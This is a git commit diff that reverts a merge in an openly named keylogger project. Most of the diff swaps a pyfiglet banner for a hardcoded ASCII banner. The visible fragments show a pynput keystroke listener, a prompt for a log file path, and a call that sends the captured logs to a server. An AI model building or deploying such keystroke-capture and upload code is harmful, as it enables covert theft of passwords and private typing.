Revert "Merge pull request #16 from Always-Amulya7/SignInUpdated"

This reverts commit 1133fbcdef51b7a73205b3f8d2af04ea842fe88c, reversing
changes made to d75b15c7bd.
This commit is contained in:
2025-09-08 21:28:41 +05:30
parent 931ab28072
commit a35bf73821
7 changed files with 104 additions and 462 deletions
+14 -6
View File
@@ -3,16 +3,24 @@ from pynput.keyboard import Listener, Key
import os
import requests
import time
import pyfiglet
# Use pyfiglet for CLI art as requested
ascii_banner = pyfiglet.figlet_format("KEY LOGGER")
print(ascii_banner)
print(r"""
_ __ _
| |/ /___ _ _ | | ___ __ _ __ _ ___ _ __
| ' // _ \ | | | | | / _ \ / _` |/ _` |/ _ \ '__|
| . \ __/ |_| | | |__| (_) | (_| | (_| | __/ |
|_|\_\___|\__, | |_____\___/ \__, |\__, |\___|_|
|___/ |___/ |___/
0.1
GitHub:https://github.com/Stalin-143
""")
# Ask user for the desired log file location
log_location = input("Please enter the full path for the log file (e.g., /path/to/logfile.txt): ")
@@ -92,4 +100,4 @@ with Listener(on_press=on_press, on_release=on_release) as listener:
listener.join()
# Send logs when the listener stops (or periodically if needed)
send_log_to_server()
send_log_to_server()